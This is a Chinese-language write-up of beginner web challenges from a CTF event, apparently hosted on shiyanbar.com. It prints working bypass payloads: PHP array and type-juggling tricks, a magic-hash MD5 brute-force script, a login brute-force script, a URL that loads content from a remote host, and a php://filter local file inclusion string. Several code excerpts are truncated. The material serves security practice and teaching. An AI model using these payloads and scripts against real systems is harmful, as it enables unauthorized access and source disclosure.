[第四届世安杯](web)writeup

ctf入门级题目

You password must be alphanumeric
';
    else if (strpos ($_GET['password'], '--') !== FALSE)
        die($flag);
    else
        echo '
Invalid password
';
}
?>


        

                View Source
        

        

                

                
        

利用ereg和strops处理数组的漏洞，提交?password[]=1

flag{Maybe_using_rexpexp_wasnt_a_clever_move}

曲奇饼

观察链接，file后面是一个base64，解码为key.txt并没有什么用。将index.phpbase64，然后不断修改line读取源码。

'key.txt', 
'1' =>'index.php', 
); 
if(isset($_COOKIE['key']) && $_COOKIE['key']=='li_lr_480'){ 
$file_list[2]='thisis_flag.php'; 
} 
if(in_array($file, $file_list)){ 
$fa = file($file); 
echo $fa[$line]; 
} 
?>

view-source:http://ctf1.shiyanbar.com/shian-quqi/index.php?line=&file=dGhpc2lzX2ZsYWcucGhw

flag{UHGgd3rfH*(3HFhuiEIWF}

类型

 2017)?$b=1:NULL;
    }
    if(is_array(@$x2["x22"])){
        if(count($x2["x22"])!==2 OR !is_array($x2["x22"][0])) die("ha?");
        $p = array_search("XIPU", $x2["x22"]);
        $p===false?die("ha?"):NULL;
        foreach($x2["x22"] as $key=>$val){
            $val==="XIPU"?die("ha?"):NULL;
        }
        $c=1;
}
}
$x3 = $_GET['x3'];
if ($x3 != '15562') {
    if (strstr($x3, 'XIPU')) {
        if (substr(md5($x3),8,16) == substr(md5('15562'),8,16)) {
            $d=1;
        }
    }
}
if($a && $b && $c && $d){
    include "flag.php";
    echo $flag;
}
?> 

最后：
x1=1a&x2={"x21":"2018a","x22":[[0],0]}&x3=XIPU18570

绕过x3的脚本

import hashlib

for i in xrange(1000000):
    s = 'XIPU' + str(i)
    mymd5 = hashlib.md5()
    mymd5.update(s)
    mymd5 = mymd5.hexdigest()
    flag = 1
    if mymd5[8:10] == '0e':
        for j in mymd5[10:24]:
            if j.isalpha():
                flag = 0
                break
        if flag == 1:
            print s
            break

CTF{Php_1s_bstl4_1a}

登录

源码提示:``，那就直接进行爆破好了

import requests
import re

s = requests.Session()


def get_rancode():
    response = s.get("http://ctf1.shiyanbar.com/shian-s/index.php")
    html = response.text
    regex = re.compile('\d\d\d')
    code = regex.findall(html)
    return code[0]

if __name__ == '__main__':
    for password in range(9999, 99999):
        code = get_rancode()
        url = "http://ctf1.shiyanbar.com/shian-s/index.php?username=admin&password={}&randcode={}".format(
            str(password), code)
        proxy={"http":"http://127.0.0.1:8080"}
        response = s.get(url)
        text = response.text

        if "flag" in text:
            print url
            break
        

脚本哪错了？没跑出来，不懂

admin

$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];

if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){
    echo "hello admin!
";
    include($file); //class.php
}else{
    echo "you are not admin ! ";

读取class.php:

http://ctf1.shiyanbar.com/shian-du/index.php?user=http://120.27.32.227/3.txt&file=php://filter/convert.base64-encode/resource=class.php&pass=1

file)){
            echo file_get_contents($this->file);    
        }
        return "__toString was called!";
    }
}

读取index.php:

";
    if(preg_match("/f1a9/",$file)){
        exit();
    }else{
        include($file); //class.php
        $pass = unserialize($pass);
        echo $pass;
    }
}else{
    echo "you are not admin ! ";
}

?>